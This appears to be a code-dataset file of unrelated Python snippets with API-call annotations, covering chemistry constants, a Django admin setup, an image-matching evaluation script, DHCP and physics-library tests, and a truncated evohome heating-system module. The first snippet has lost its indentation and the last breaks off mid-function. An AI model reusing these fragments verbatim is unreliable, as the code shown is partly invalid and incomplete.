    11: 'Na', 12: 'Mg', 13: 'Al', 14: 'Si', 15: 'P', 16: 'S', 17: 'Cl', 18: 'Ar'
}
# converts an atomic label to a nuclear charge
LABEL2Z = {}
for key in Z2LABEL:
LABEL2Z[Z2LABEL[key]] = key
# masses from UIPAC: http://www.chem.qmul.ac.uk/iupac/AtWt/
MASSES = {0: 0.00,
1: 1.00784, 2: 4.002602,
3: 6.938, 4: 9.01218, 5: 10.806, 6: 12.0096, 7: 14.00643, 8: 15.99903, 9: 18.998403, 10: 20.1797,
11: 22.9898, 12: 24.304, 13: 26.9815, 14: 28.084, 15: 30.973, 16: 32.059, 17: 35.446, 18: 39.948
}
# <NAME>al radii from Alvarez (2013), DOI: 2013/dt/c3dt50599e
# all values in Angstrom
VDWRADII = {0: 0.00,
1: 1.20, 2: 1.43,
3: 2.12, 4: 1.98, 5: 1.91, 6: 1.77, 7: 1.66, 8: 1.50, 9: 1.46, 10: 1.58,
11: 2.50, 12: 2.51, 13: 2.25, 14: 2.19, 15: 1.90, 16: 1.89, 17: 1.82, 18: 1.83
}
# Covalent radii from Pyykkö and Atsumi (2009), DOI: 10.1002/chem.200800987
# all values in Angstrom
COVALENTRADII = {0: 0.00,
1: 0.32, 2: 0.46,
3: 1.33, 4: 1.02, 5: 0.85, 6: 0.75, 7: 0.71, 8: 0.63, 9: 0.64, 10: 0.67,
11: 1.55, 12: 1.39, 13: 1.26, 14: 1.16, 15: 1.11, 16: 1.03, 17: 0.99, 18: 0.96
}
# Coordination numbers from Pyykkö and Atsumi (2009), DOI: 10.1002/chem.200800987
COORDINATION = {0: 0,
1: 1, 2: 1,
3: 1, 4: 2, 5: 3, 6: 4, 7: 3, 8: 2, 9: 1, 10: 1,
11: 1, 12: 2, 13: 3, 14: 4, 15: 3, 16: 2, 17: 1, 18: 1
}
def idamax(a):
""" Returns the index of maximum absolute value (positive or negative)
in the input array a.
    Note: Loosely based on a subroutine in GAMESS with the same name
Arguments:
a -- a numpy array where we are to find the maximum
value in (either positive or negative)
Returns:
the index in the array where the maximum value is.
"""
idx = -1
v = 0.0
for i, value in enumerate(numpy.abs(a)):
if value > v:
idx = i
v = value
return idx
def idamin(a):
""" Returns the index of minimum absolute value (positive or negative)
in the input array a.
Arguments:
a -- a numpy array where we are to find the minimum
value in (either positive or negative)
Returns:
    the index in the array where the minimum value is.
"""
idx = -1
v = 1.0e30
for i, value in enumerate(numpy.abs(a)):
if value < v:
idx = i
v = value
return idx
| [
"numpy.abs"
] | [((2360, 2372), 'numpy.abs', 'numpy.abs', (['a'], {}), '(a)\n', (2369, 2372), False, 'import numpy\n'), ((2851, 2863), 'numpy.abs', 'numpy.abs', (['a'], {}), '(a)\n', (2860, 2863), False, 'import numpy\n')] |
from Invoice import Invoice
def main():
items = [Invoice("RTX 2080", "VGA", 5, 10000000), Invoice("Intel i9 10900K", "Processor", 10, 8000000)]
for item in items:
print(item.part_num)
print(item.part_desc)
print(item.quantity)
print(item.price)
print("Total tagihanmu adalah", item.get_invoice_amount(), end="\n\n")
if __name__ == "__main__":
main()
| [
"Invoice.Invoice"
] | [((56, 95), 'Invoice.Invoice', 'Invoice', (['"""RTX 2080"""', '"""VGA"""', '(5)', '(10000000)'], {}), "('RTX 2080', 'VGA', 5, 10000000)\n", (63, 95), False, 'from Invoice import Invoice\n'), ((97, 149), 'Invoice.Invoice', 'Invoice', (['"""Intel i9 10900K"""', '"""Processor"""', '(10)', '(8000000)'], {}), "('Intel i9 10900K', 'Processor', 10, 8000000)\n", (104, 149), False, 'from Invoice import Invoice\n')] |
from django.contrib import admin
from polymorphic.admin import PolymorphicParentModelAdmin
from polymorphic.admin import PolymorphicChildModelAdmin
from csat.acquisition import get_collectors, models
class AcquisitionSessionConfigAdmin(admin.ModelAdmin):
list_display = ('id', 'name', 'started', 'completed', 'temporary',
'status')
admin.site.register(models.AcquisitionSessionConfig,
AcquisitionSessionConfigAdmin)
class DataCollectorConfigAdmin(PolymorphicChildModelAdmin):
base_model = models.DataCollectorConfig
class GenericDataCollectorConfigAdmin(PolymorphicParentModelAdmin):
list_display = ('id', 'name', 'session_config')
base_model = models.DataCollectorConfig
def get_child_models(self):
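        # build one (model class, admin class) pair per registered collector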
        def iter_children():
            for collector in get_collectors():
                yield (collector.get_model(), DataCollectorConfigAdmin)
        return tuple(iter_children())
admin.site.register(models.DataCollectorConfig,
GenericDataCollectorConfigAdmin)
| [
"csat.acquisition.get_collectors",
"django.contrib.admin.site.register"
] | [((360, 447), 'django.contrib.admin.site.register', 'admin.site.register', (['models.AcquisitionSessionConfig', 'AcquisitionSessionConfigAdmin'], {}), '(models.AcquisitionSessionConfig,\n AcquisitionSessionConfigAdmin)\n', (379, 447), False, 'from django.contrib import admin\n'), ((955, 1040), 'django.contrib.admin.site.register', 'admin.site.register', (['models.DataCollectorConfig', 'GenericDataCollectorConfigAdmin'], {}), '(models.DataCollectorConfig, GenericDataCollectorConfigAdmin\n )\n', (974, 1040), False, 'from django.contrib import admin\n'), ((826, 842), 'csat.acquisition.get_collectors', 'get_collectors', ([], {}), '()\n', (840, 842), False, 'from csat.acquisition import get_collectors, models\n')] |
from __future__ import print_function, division
import os
from os.path import exists
import numpy as np
import torch
import torch.nn as nn
from torch.utils.data import Dataset, DataLoader
from collections import OrderedDict
from lib.model import ImMatchNet
from lib.pf_willow_dataset import PFDataset
from lib.normalization import NormalizeImageDict
from lib.torch_util import BatchTensorToVars, str_to_bool
from lib.point_tnf import corr_to_matches
from lib.eval_util import pck_metric
from lib.dataloader import default_collate
from lib.torch_util import collate_custom
import argparse
print('NCNet evaluation script - PF Willow dataset')
use_cuda = torch.cuda.is_available()
# Argument parsing
parser = argparse.ArgumentParser(description='Compute PF Willow matches')
parser.add_argument('--checkpoint', type=str, default='')
parser.add_argument('--image_size', type=int, default=400)
parser.add_argument('--eval_dataset_path', type=str, default='datasets/', help='path to PF Willow dataset')
args = parser.parse_args()
# Create model
print('Creating CNN model...')
model = ImMatchNet(use_cuda=use_cuda,
checkpoint=args.checkpoint)
# Dataset and dataloader
Dataset = PFDataset
collate_fn = default_collate
csv_file = 'PF-dataset/test_pairs_pf.csv'
cnn_image_size = (args.image_size, args.image_size)
dataset = Dataset(csv_file=os.path.join(args.eval_dataset_path, csv_file),
dataset_path=args.eval_dataset_path,
transform=NormalizeImageDict(['source_image', 'target_image']),
output_size=cnn_image_size)
dataset.pck_procedure = 'scnet'
# Only batch_size=1 is supported for evaluation
batch_size = 1
dataloader = DataLoader(dataset, batch_size=batch_size,
shuffle=False, num_workers=0,
collate_fn=collate_fn)
batch_tnf = BatchTensorToVars(use_cuda=use_cuda)
model.eval()
# initialize vector for storing results
stats = {}
stats['point_tnf'] = {}
stats['point_tnf']['pck'] = np.zeros((len(dataset), 1))
# Compute
for i, batch in enumerate(dataloader):
batch = batch_tnf(batch)
batch_start_idx = batch_size * i
corr4d = model(batch)
# get matches
xA, yA, xB, yB, sB = corr_to_matches(corr4d, do_softmax=True)
matches = (xA, yA, xB, yB)
stats = pck_metric(batch, batch_start_idx, matches, stats, args, use_cuda)
print('Batch: [{}/{} ({:.0f}%)]'.format(i, len(dataloader), 100. * i / len(dataloader)))
# Print results
results = stats['point_tnf']['pck']
good_idx = np.flatnonzero((results != -1) * ~np.isnan(results))
print('Total: ' + str(results.size))
print('Valid: ' + str(good_idx.size))
filtered_results = results[good_idx]
print('PCK:', '{:.2%}'.format(np.mean(filtered_results))) | [
"lib.torch_util.BatchTensorToVars",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.path.join",
"lib.normalization.NormalizeImageDict",
"numpy.isnan",
"lib.point_tnf.corr_to_matches",
"numpy.mean",
"torch.cuda.is_available",
"lib.model.ImMatchNet",
"lib.eval_util.pck_metric"
] | [((656, 681), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (679, 681), False, 'import torch\n'), ((711, 775), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Compute PF Willow matches"""'}), "(description='Compute PF Willow matches')\n", (734, 775), False, 'import argparse\n'), ((1084, 1141), 'lib.model.ImMatchNet', 'ImMatchNet', ([], {'use_cuda': 'use_cuda', 'checkpoint': 'args.checkpoint'}), '(use_cuda=use_cuda, checkpoint=args.checkpoint)\n', (1094, 1141), False, 'from lib.model import ImMatchNet\n'), ((1700, 1799), 'torch.utils.data.DataLoader', 'DataLoader', (['dataset'], {'batch_size': 'batch_size', 'shuffle': '(False)', 'num_workers': '(0)', 'collate_fn': 'collate_fn'}), '(dataset, batch_size=batch_size, shuffle=False, num_workers=0,\n collate_fn=collate_fn)\n', (1710, 1799), False, 'from torch.utils.data import Dataset, DataLoader\n'), ((1857, 1893), 'lib.torch_util.BatchTensorToVars', 'BatchTensorToVars', ([], {'use_cuda': 'use_cuda'}), '(use_cuda=use_cuda)\n', (1874, 1893), False, 'from lib.torch_util import BatchTensorToVars, str_to_bool\n'), ((2227, 2267), 'lib.point_tnf.corr_to_matches', 'corr_to_matches', (['corr4d'], {'do_softmax': '(True)'}), '(corr4d, do_softmax=True)\n', (2242, 2267), False, 'from lib.point_tnf import corr_to_matches\n'), ((2312, 2378), 'lib.eval_util.pck_metric', 'pck_metric', (['batch', 'batch_start_idx', 'matches', 'stats', 'args', 'use_cuda'], {}), '(batch, batch_start_idx, matches, stats, args, use_cuda)\n', (2322, 2378), False, 'from lib.eval_util import pck_metric\n'), ((1359, 1405), 'os.path.join', 'os.path.join', (['args.eval_dataset_path', 'csv_file'], {}), '(args.eval_dataset_path, csv_file)\n', (1371, 1405), False, 'import os\n'), ((1490, 1542), 'lib.normalization.NormalizeImageDict', 'NormalizeImageDict', (["['source_image', 'target_image']"], {}), "(['source_image', 'target_image'])\n", (1508, 1542), False, 'from lib.normalization import NormalizeImageDict\n'), ((2732, 2757), 'numpy.mean', 'np.mean', (['filtered_results'], {}), '(filtered_results)\n', (2739, 2757), True, 'import numpy as np\n'), ((2571, 2588), 'numpy.isnan', 'np.isnan', (['results'], {}), '(results)\n', (2579, 2588), True, 'import numpy as np\n')] |
import unittest
from ipaddress import IPv4Address, IPv6Address
from unittest.mock import patch
from utils.dhcp import parse_dhcp_lease_file
from utils.config_reader import ConfigData
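# stand-in for ConfigData.get_dhcp_info, applied below via patch.object; it blacklists the host 'orion'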
def config_file_with_black_list(self):
return {
'dhcp': {
'lease_file': './dhcp_leases_test',
'ignore_hosts': ['orion']
}
}
class TestDHCP(unittest.TestCase):
def setUp(self):
dhcp_lease_file = './dhcp_leases_test'
self.dhcp_data = parse_dhcp_lease_file(dhcp_lease_file)
def test_data_parsing(self):
self.assertEqual(3, len(self.dhcp_data.keys()))
def test_ipv4_parsing(self):
ipv4_count = 0
for v in self.dhcp_data.values():
if v.get('ipv4'):
if isinstance(v['ipv4'], IPv4Address):
ipv4_count += 1
self.assertEqual(3, ipv4_count)
def test_ipv6_parsing(self):
ipv6_count = 0
for v in self.dhcp_data.values():
if v.get('ipv6'):
if isinstance(v['ipv6'], IPv6Address):
ipv6_count += 1
self.assertEqual(1, ipv6_count)
@patch.object(ConfigData, 'get_dhcp_info', config_file_with_black_list)
def test_ignore_host(self):
dhcp_data = parse_dhcp_lease_file('./dhcp_leases_test')
self.assertEqual(
'58:40:4e:b9:08:f0' in dhcp_data.keys(),
False
)
| [
"unittest.mock.patch.object",
"utils.dhcp.parse_dhcp_lease_file"
] | [((1180, 1250), 'unittest.mock.patch.object', 'patch.object', (['ConfigData', '"""get_dhcp_info"""', 'config_file_with_black_list'], {}), "(ConfigData, 'get_dhcp_info', config_file_with_black_list)\n", (1192, 1250), False, 'from unittest.mock import patch\n'), ((523, 561), 'utils.dhcp.parse_dhcp_lease_file', 'parse_dhcp_lease_file', (['dhcp_lease_file'], {}), '(dhcp_lease_file)\n', (544, 561), False, 'from utils.dhcp import parse_dhcp_lease_file\n'), ((1303, 1346), 'utils.dhcp.parse_dhcp_lease_file', 'parse_dhcp_lease_file', (['"""./dhcp_leases_test"""'], {}), "('./dhcp_leases_test')\n", (1324, 1346), False, 'from utils.dhcp import parse_dhcp_lease_file\n')] |
import pickle
import easymunk as p
class TestShapeFilter:
def test_init(self) -> None:
f = p.ShapeFilter()
assert f.group == 0
assert f.categories == 0xFFFFFFFF
assert f.mask == 0xFFFFFFFF
f = p.ShapeFilter(1, 2, 3)
assert f.group == 1
assert f.categories == 2
assert f.mask == 3
def test_constants(self) -> None:
assert p.ShapeFilter.ALL_MASKS() == 0xFFFFFFFF
assert p.ShapeFilter.ALL_CATEGORIES() == 0xFFFFFFFF
def test_eq(self) -> None:
f1 = p.ShapeFilter(1, 2, 3)
f2 = p.ShapeFilter(1, 2, 3)
f3 = p.ShapeFilter(2, 3, 4)
assert f1 == f2
assert f1 != f3
def test_pickle(self) -> None:
x = p.ShapeFilter(1, 2, 3)
s = pickle.dumps(x, 2)
actual = pickle.loads(s)
assert x == actual
class TestContactPoint:
pass
class TestContactPointSet:
pass
| [
"pickle.loads",
"easymunk.ShapeFilter",
"easymunk.ShapeFilter.ALL_CATEGORIES",
"easymunk.ShapeFilter.ALL_MASKS",
"pickle.dumps"
] | [((107, 122), 'easymunk.ShapeFilter', 'p.ShapeFilter', ([], {}), '()\n', (120, 122), True, 'import easymunk as p\n'), ((242, 264), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (255, 264), True, 'import easymunk as p\n'), ((552, 574), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (565, 574), True, 'import easymunk as p\n'), ((588, 610), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (601, 610), True, 'import easymunk as p\n'), ((624, 646), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(2)', '(3)', '(4)'], {}), '(2, 3, 4)\n', (637, 646), True, 'import easymunk as p\n'), ((743, 765), 'easymunk.ShapeFilter', 'p.ShapeFilter', (['(1)', '(2)', '(3)'], {}), '(1, 2, 3)\n', (756, 765), True, 'import easymunk as p\n'), ((778, 796), 'pickle.dumps', 'pickle.dumps', (['x', '(2)'], {}), '(x, 2)\n', (790, 796), False, 'import pickle\n'), ((814, 829), 'pickle.loads', 'pickle.loads', (['s'], {}), '(s)\n', (826, 829), False, 'import pickle\n'), ((407, 432), 'easymunk.ShapeFilter.ALL_MASKS', 'p.ShapeFilter.ALL_MASKS', ([], {}), '()\n', (430, 432), True, 'import easymunk as p\n'), ((462, 492), 'easymunk.ShapeFilter.ALL_CATEGORIES', 'p.ShapeFilter.ALL_CATEGORIES', ([], {}), '()\n', (490, 492), True, 'import easymunk as p\n')] |
#!/usr/bin/env python3
# coding: utf-8
from .BaseType import BaseType
from ..Manager import Register
import re
class Integer(BaseType):
'''Integer type
An Integer is a number that can be written without a fractional component.
    An Integer is composed only of the digits 0 to 9 (optionally preceded by a minus sign).
'''
name = 'int'
def format(self, value):
'''Format string to Integer'''
return int(value)
def detect(self, value):
        '''Is value an Integer?
        Test whether value is composed only of the digits 0 to 9 (an optional leading minus sign is allowed).
'''
return re.match(r'^-?[0-9]+$', value) is not None
def fromBytes(self, _bytes):
'''Convert bytes to Integer using big endian'''
return int.from_bytes(_bytes, 'big')
def toBytes(self, value):
'''Convert Integer to bytes using big endian'''
return value.to_bytes(max(1, (value.bit_length() + 7) // 8), 'big')
def toString(self, value):
'''Return value as string'''
return str(value)
# Register the type
Register.registerType(Integer())
| [
"re.match"
] | [((575, 604), 're.match', 're.match', (['"""^-?[0-9]+$"""', 'value'], {}), "('^-?[0-9]+$', value)\n", (583, 604), False, 'import re\n')] |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
"""Evohome RF - The evohome-compatible system."""
import logging
from asyncio import Task
from datetime import timedelta as td
from threading import Lock
from typing import List, Optional
from .command import Command, FaultLog, Priority
from .const import (
ATTR_DEVICES,
DEVICE_HAS_ZONE_SENSOR,
DISCOVER_ALL,
DISCOVER_PARAMS,
DISCOVER_SCHEMA,
DISCOVER_STATUS,
SystemMode,
SystemType,
__dev_mode__,
)
from .devices import Device, Entity
from .exceptions import CorruptStateError, ExpiredCallbackError
from .schema import (
ATTR_CONTROLLER,
ATTR_DHW_SYSTEM,
ATTR_HTG_CONTROL,
ATTR_HTG_SYSTEM,
ATTR_ORPHANS,
ATTR_UFH_SYSTEM,
ATTR_ZONES,
DISABLE_DISCOVERY,
MAX_ZONES,
)
from .zones import DhwZone, Zone
DEV_MODE = __dev_mode__
_LOGGER = logging.getLogger(__name__)
if DEV_MODE:
_LOGGER.setLevel(logging.DEBUG)
class SysFaultLog: # 0418
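    """Mixin that maintains the controller's fault log (0418)."""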
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._fault_log = FaultLog(self._ctl)
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._gwy._tasks.append(self._loop.create_task(self.get_fault_log()))
async def get_fault_log(self, force_refresh=None) -> Optional[dict]: # 0418
try:
return await self._fault_log.get_fault_log(force_refresh=force_refresh)
except ExpiredCallbackError:
return
@property
def status(self) -> dict:
status = super().status
assert "fault_log" not in status # TODO: removeme
status["fault_log"] = self._fault_log.fault_log
status["last_fault"] = self._msgz[" I"].get("0418")
return status
class SysDatetime: # 313F
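    """Mixin that tracks the controller's date/time (313F)."""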
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._datetime = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
self._gwy.send_cmd(Command.get_system_time(self.id))
# self._send_cmd("313F")
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "313F" and msg.verb in (" I", "RP"): # TODO: W
self._datetime = msg
@property
def datetime(self) -> Optional[str]:
return self._msg_payload(self._datetime, "datetime") # TODO: make a dt object
# def wait_for(self, cmd, callback):
# self._api_lock.acquire()
# self._send_cmd("313F", verb="RQ", callback=callback)
# time_start = dt.now()
# while not self._schedule_done:
# await asyncio.sleep(TIMER_SHORT_SLEEP)
# if dt.now() > time_start + TIMER_LONG_TIMEOUT:
# self._api_lock.release()
# raise ExpiredCallbackError("failed to set schedule")
# self._api_lock.release()
# async def get_datetime(self) -> str: # wait for the RP/313F
# await self.wait_for(Command("313F", verb="RQ"))
# return self.datetime
# async def set_datetime(self, dtm: dt) -> str: # wait for the I/313F
# await self.wait_for(Command("313F", verb=" W", payload=f"00{dtm_to_hex(dtm)}"))
# return self.datetime
@property
def status(self) -> dict:
status = super().status
assert ATTR_HTG_SYSTEM in status # TODO: removeme
assert "datetime" not in status[ATTR_HTG_SYSTEM] # TODO: removeme
status[ATTR_HTG_SYSTEM]["datetime"] = self.datetime
return status
class SysLanguage: # 0100
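    """Mixin that tracks the controller's language setting (0100)."""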
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._language = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_PARAMS:
self._send_cmd("0100") # language
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "0100" and msg.verb in (" I", "RP"):
self._language = msg
@property
def language(self) -> Optional[str]: # 0100
return self._msg_payload(self._language, "language")
@property
def params(self) -> dict:
params = super().params
assert ATTR_HTG_SYSTEM in params # TODO: removeme
assert "language" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["language"] = self.language
return params
class SysMode: # 2E04
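    """Mixin that tracks, and can set, the system mode (2E04)."""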
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._system_mode = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
# self._send_cmd("2E04", payload="FF") # system mode
self._gwy.send_cmd(Command.get_system_mode(self.id))
def _handle_msg(self, msg, prev_msg=None):
super()._handle_msg(msg)
if msg.code == "2E04" and msg.verb in (" I", "RP"): # this is a special case
self._system_mode = msg
@property
def system_mode(self) -> Optional[dict]: # 2E04
return self._msg_payload(self._system_mode)
def set_mode(self, system_mode=None, until=None) -> Task:
"""Set a system mode for a specified duration, or indefinitely."""
cmd = Command.set_system_mode(self.id, system_mode=system_mode, until=until)
return self._gwy.send_cmd(cmd)
def set_auto(self) -> Task:
"""Revert system to Auto, set non-PermanentOverride zones to FollowSchedule."""
return self.set_mode(SystemMode.AUTO)
def reset_mode(self) -> Task:
"""Revert system to Auto, force *all* zones to FollowSchedule."""
return self.set_mode(SystemMode.RESET)
@property
def params(self) -> dict:
params = super().params
assert ATTR_HTG_SYSTEM in params # TODO: removeme
assert "system_mode" not in params[ATTR_HTG_SYSTEM] # TODO: removeme
params[ATTR_HTG_SYSTEM]["system_mode"] = self.system_mode
return params
class StoredHw:
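    """Mixin that manages the stored hot water (DHW) zone, if any."""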
MIN_SETPOINT = 30.0 # NOTE: these may be removed
MAX_SETPOINT = 85.0
DEFAULT_SETPOINT = 50.0
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self._dhw = None
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_STATUS:
pass
def _handle_msg(self, msg, prev_msg=None):
"""Eavesdrop packets, or pairs of packets, to maintain the system state."""
def OUT_find_dhw_sensor(this):
"""Discover the stored HW this system (if any).
There is only 2 ways to to find a controller's DHW sensor:
1. The 10A0 RQ/RP *from/to a 07:* (1x/4h) - reliable
2. Use sensor temp matching - non-deterministic
            Data from the CTL is considered more authoritative. The RQ is initiated by the
            DHW, so is not authoritative. The I/1260 is not to/from a controller, so is
not useful.
"""
# 10A0: RQ/07/01, RP/01/07: can get both parent controller & DHW sensor
# 047 RQ --- 07:030741 01:102458 --:------ 10A0 006 00181F0003E4
# 062 RP --- 01:102458 07:030741 --:------ 10A0 006 0018380003E8
# 1260: I/07: can't get which parent controller - need to match temps
# 045 I --- 07:045960 --:------ 07:045960 1260 003 000911
# 1F41: I/01: get parent controller, but not DHW sensor
# 045 I --- 01:145038 --:------ 01:145038 1F41 012 000004FFFFFF1E060E0507E4
# 045 I --- 01:145038 --:------ 01:145038 1F41 006 000002FFFFFF
sensor = None
if this.code == "10A0" and this.verb == "RP":
if this.src is self and this.dst.type == "07":
sensor = this.dst
if sensor is not None:
if self.dhw is None:
self._get_zone("FA")
self.dhw._set_sensor(sensor)
super()._handle_msg(msg)
if msg.code in ("10A0", "1260"): # self.dhw.sensor is None and
# if self.dhw.sensor is None:
# find_dhw_sensor(msg)
pass
elif msg.code in ("1F41",): # dhw_mode
pass
def _get_zone(self, zone_idx, sensor=None, **kwargs) -> DhwZone:
"""Return a DHW zone (will create it if required).
        Can also set a DHW zone's sensor and valves.
"""
def create_dhw(zone_idx) -> DhwZone:
if self.dhw:
raise LookupError(f"Duplicate stored HW: {zone_idx}")
dhw = self._dhw = DhwZone(self)
if not self._gwy.config[DISABLE_DISCOVERY]:
dhw._discover() # discover_flag=DISCOVER_ALL)
return dhw
if zone_idx != "HW":
return
zone = self.dhw # TODO: self.zone_by_idx.get("HW") too?
if zone is None:
zone = create_dhw(zone_idx)
if kwargs.get("dhw_valve"):
zone._set_dhw_valve(kwargs["dhw_valve"])
if kwargs.get("htg_valve"):
zone._set_dhw_valve(kwargs["htg_valve"])
if sensor is not None:
zone._set_dhw_sensor(sensor)
return zone
@property
def dhw(self) -> DhwZone:
return self._dhw
def _set_dhw(self, dhw: DhwZone) -> None: # self._dhw
"""Set the DHW zone system."""
if not isinstance(dhw, DhwZone):
raise TypeError(f"stored_hw can't be: {dhw}")
if self._dhw is not None:
if self._dhw is dhw:
return
raise CorruptStateError("DHW shouldn't change: {self._dhw} to {dhw}")
if self._dhw is None:
# self._gwy._get_device(xxx)
# self.add_device(dhw.sensor)
# self.add_device(dhw.relay)
self._dhw = dhw
@property
def dhw_sensor(self) -> Device:
return self._dhw._dhw_sensor if self._dhw else None
@property
def hotwater_valve(self) -> Device:
return self._dhw._dhw_valve if self._dhw else None
@property
def heating_valve(self) -> Device:
return self._dhw._htg_valve if self._dhw else None
@property
def schema(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().schema # TODO: removeme
return {**super().schema, ATTR_DHW_SYSTEM: self.dhw.schema if self.dhw else {}}
@property
def params(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().params # TODO: removeme
return {**super().params, ATTR_DHW_SYSTEM: self.dhw.params if self.dhw else {}}
@property
def status(self) -> dict:
assert ATTR_DHW_SYSTEM not in super().status # TODO: removeme
return {**super().status, ATTR_DHW_SYSTEM: self.dhw.status if self.dhw else {}}
class MultiZone: # 0005 (+/- 000C?)
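    """Mixin that manages the controller's heating zones (0005/000C)."""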
def __init__(self, *args, **kwargs) -> None:
super().__init__(*args, **kwargs)
self.zones = []
self.zone_by_idx = {}
# self.zone_by_name = {}
self.zone_lock = Lock()
self.zone_lock_idx = None
# self._prev_30c9 = None # OUT: used to discover zone sensors
def _discover(self, discover_flag=DISCOVER_ALL) -> None:
super()._discover(discover_flag=discover_flag)
if discover_flag & DISCOVER_SCHEMA:
[ # 0005: find any zones + their type (RAD, UFH, VAL, MIX, ELE)
self._send_cmd("0005", payload=f"00{zone_type}")
for zone_type in ("08", "09", "0A", "0B", "11") # CODE_0005_ZONE_TYPE
]
[ # 0005: find any others - as per an RFG100
self._send_cmd("0005", payload=f"00{zone_type}")
for zone_type in ("00", "04", "0C", "0F", "10")
]
if discover_flag & DISCOVER_STATUS:
self._send_cmd("0006")
def _handle_msg(self, msg, prev_msg=None):
def OUT_find_zone_sensors() -> None:
"""Determine each zone's sensor by matching zone/sensor temperatures.
The temperature of each zone is reliably known (30C9 array), but the sensor
for each zone is not. In particular, the controller may be a sensor for a
zone, but unfortunately it does not announce its sensor temperatures.
In addition, there may be 'orphan' (e.g. from a neighbour) sensors
announcing temperatures with the same value.
This leaves only a process of exclusion as a means to determine which zone
uses the controller as a sensor.
"""
prev_msg, self._prev_30c9 = self._prev_30c9, msg
if prev_msg is None:
return
if len([z for z in self.zones if z.sensor is None]) == 0:
return # (currently) no zone without a sensor
# if self._gwy.serial_port: # only if in monitor mode...
secs = self._get_msg_value("1F09", "remaining_seconds")
if secs is None or msg.dtm > prev_msg.dtm + td(seconds=secs):
return # only compare against 30C9 (array) pkt from the last cycle
_LOGGER.debug("System state (before): %s", self)
changed_zones = {
z["zone_idx"]: z["temperature"]
for z in msg.payload
if z not in prev_msg.payload
} # zones with changed temps
_LOGGER.debug("Changed zones (from 30C9): %s", changed_zones)
if not changed_zones:
return # ctl's 30C9 says no zones have changed temps during this cycle
testable_zones = {
z: t
for z, t in changed_zones.items()
if self.zone_by_idx[z].sensor is None
and t not in [v for k, v in changed_zones.items() if k != z] + [None]
} # ...with unique (non-null) temps, and no sensor
_LOGGER.debug(
" - with unique/non-null temps (from 30C9), no sensor (from state): %s",
testable_zones,
)
if not testable_zones:
return # no testable zones
testable_sensors = [
d
for d in self._gwy.devices # not: self.devices
if d._ctl in (self, None)
and d.addr.type in DEVICE_HAS_ZONE_SENSOR
and d.temperature is not None
and d._msgs["30C9"].dtm > prev_msg.dtm # changed temp during last cycle
]
if _LOGGER.isEnabledFor(logging.DEBUG):
_LOGGER.debug(
"Testable zones: %s (unique/non-null temps & sensorless)",
testable_zones,
)
_LOGGER.debug(
"Testable sensors: %s (non-null temps & orphans or zoneless)",
{d.id: d.temperature for d in testable_sensors},
)
if testable_sensors: # the main matching algorithm...
for zone_idx, temp in testable_zones.items():
# TODO: when sensors announce temp, ?also includes it's parent zone
matching_sensors = [
s
for s in testable_sensors
if s.temperature == temp and s._zone in (zone_idx, None)
]
_LOGGER.debug("Testing zone %s, temp: %s", zone_idx, temp)
_LOGGER.debug(
" - matching sensor(s): %s (same temp & not from another zone)",
[s.id for s in matching_sensors],
)
if len(matching_sensors) == 1:
_LOGGER.debug(" - matched sensor: %s", matching_sensors[0].id)
zone = self.zone_by_idx[zone_idx]
zone._set_sensor(matching_sensors[0])
zone.sensor._set_ctl(self)
elif len(matching_sensors) == 0:
_LOGGER.debug(" - no matching sensor (uses CTL?)")
else:
_LOGGER.debug(" - multiple sensors: %s", matching_sensors)
_LOGGER.debug("System state (after): %s", self)
# now see if we can allocate the controller as a sensor...
if self._zone is not None:
return # the controller has already been allocated
if len([z for z in self.zones if z.sensor is None]) != 1:
return # no single zone without a sensor
testable_zones = {
z: t
for z, t in changed_zones.items()
if self.zone_by_idx[z].sensor is None
} # this will be true if ctl is sensor
if not testable_zones:
return # no testable zones
zone_idx, temp = list(testable_zones.items())[0]
_LOGGER.debug("Testing (sole remaining) zone %s, temp: %s", zone_idx, temp)
# want to avoid complexity of z._temp
# zone = self.zone_by_idx[zone_idx]
# if zone._temp is None:
# return # TODO: should have a (not-None) temperature
matching_sensors = [
s
for s in testable_sensors
if s.temperature == temp and s._zone in (zone_idx, None)
]
_LOGGER.debug(
" - matching sensor(s): %s (excl. controller)",
[s.id for s in matching_sensors],
)
# can safely(?) assume this zone is using the CTL as a sensor...
if len(matching_sensors) == 0:
_LOGGER.debug(" - matched sensor: %s (by exclusion)", self._ctl.id)
zone = self.zone_by_idx[zone_idx]
zone._set_sensor(self)
zone.sensor._set_ctl(self)
_LOGGER.debug("System state (finally): %s", self)
super()._handle_msg(msg)
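        # a 000A (zone_params) array prompts a low-priority zone-mode query for every known zone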
if msg.code in ("000A",) and isinstance(msg.payload, list):
for zone_idx in self.zone_by_idx:
